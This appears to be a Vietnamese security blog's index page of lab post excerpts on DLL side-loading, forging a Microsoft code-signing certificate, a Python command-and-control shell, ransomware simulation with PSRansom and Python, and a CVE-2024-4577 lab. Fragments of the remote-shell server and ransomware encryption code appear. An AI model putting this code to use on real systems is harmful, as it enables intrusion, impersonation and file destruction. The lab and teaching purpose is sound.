Bảo Mật – syvtit

Giả lập tình huống DLL Side Loading

July 7, 2025July 7, 2025syvtit

DLL Side Loading (hay dll search order hijacking) là một kỹ thuật trong đó kẻ tấn công giả mạo một file DLL và ép một ứng dụng hợp pháp load DLL giả này thay vì bản gốc. Điều này cho phép thực thi mã độc trong ngữ cảnh của ứng dụng tin cậy (Signed, trusted). […]

Giả chứng chỉ số trên file thực thi

July 5, 2025July 7, 2025syvtit

B1: Sử dụng code powershell sau đây để tạo file hello.exe $code = @”using System;public class HelloWorld {public static void Main() {Console.WriteLine(“Hello World”);Console.ReadLine();}}“@ Add-Type -TypeDefinition $code -OutputAssembly “hello.exe” -OutputType ConsoleApplication B2: chạy thử hello.exe để xem kết quả B3: Tạo certificate giả mạo “Microsoft Corporation” bằng code powershell sau đây # Định nghĩa thông tin […]

Tcp Connection và tùy chỉnh giả lập

October 13, 2024October 13, 2024syvtitLeave a Comment

1. Viết Tcp Connection đơn giản với Python tcpServer.py tcpClient import socketdef connect(): s = socket.socket() s.bind((“0.0.0.0”,12345)) s.listen(1) conn , addr = s.accept() print(‘[+] We got a connection from’, addr) while True: command = input(“Shell> “) if ‘terminate’ in command: conn.send(‘terminate’.encode()) conn.close() break else: try: conn.send(command.encode()) print(conn.recv(4096).decode()) except ValueError as ve: print(ve)connect() import socketimport subprocess def […]

PSRansom

October 4, 2024October 4, 2024syvtit

Đây là một công cụ giúp bạn mô phỏng quá trình mã hóa của một ransomware trong hệ thống sử dụng powershell, cùng với đó là khởi tạo kết nối đến C2 server để gửi dữ liệu. Tham khảo thêm tại link sau: Sau đây là cách thức thực hiện: B1: Dựng C2 Server, ở […]

CVE-2024-4577

September 21, 2024September 21, 2024syvtit

1. Dựng máy chủ có lỗ hổng CVE-2024-4577 B1: trong tình huống bài lab này mình sẽ sử dụng windows server 2022 standard để dựng máy chủ B2: Chuyển đổi system locale sang (Traditional Chinnese, Simplified Chinese hoặc Japanese). Trong bài lab này mình sẽ chuyển sang Japanese B3: Cài đặt Xampp với phiên bản […]

Ransomware – mã hóa file với Python

September 11, 2024February 24, 2025syvtitLeave a Comment

Trong bài này mình sẽ dùng source code sau đây để mã hóa một số file có đường dẫn được khai báo để giả lập tình huống mã độc ransomware. 1. Source code from cryptography.fernet import Fernetimport osdef encfile(encfile): #key generation if(os.path.isfile(‘filekey.key’)): with open(‘filekey.key’,’rb’) as filekey: key = filekey.read() else: key = Fernet.generate_key() #using the […]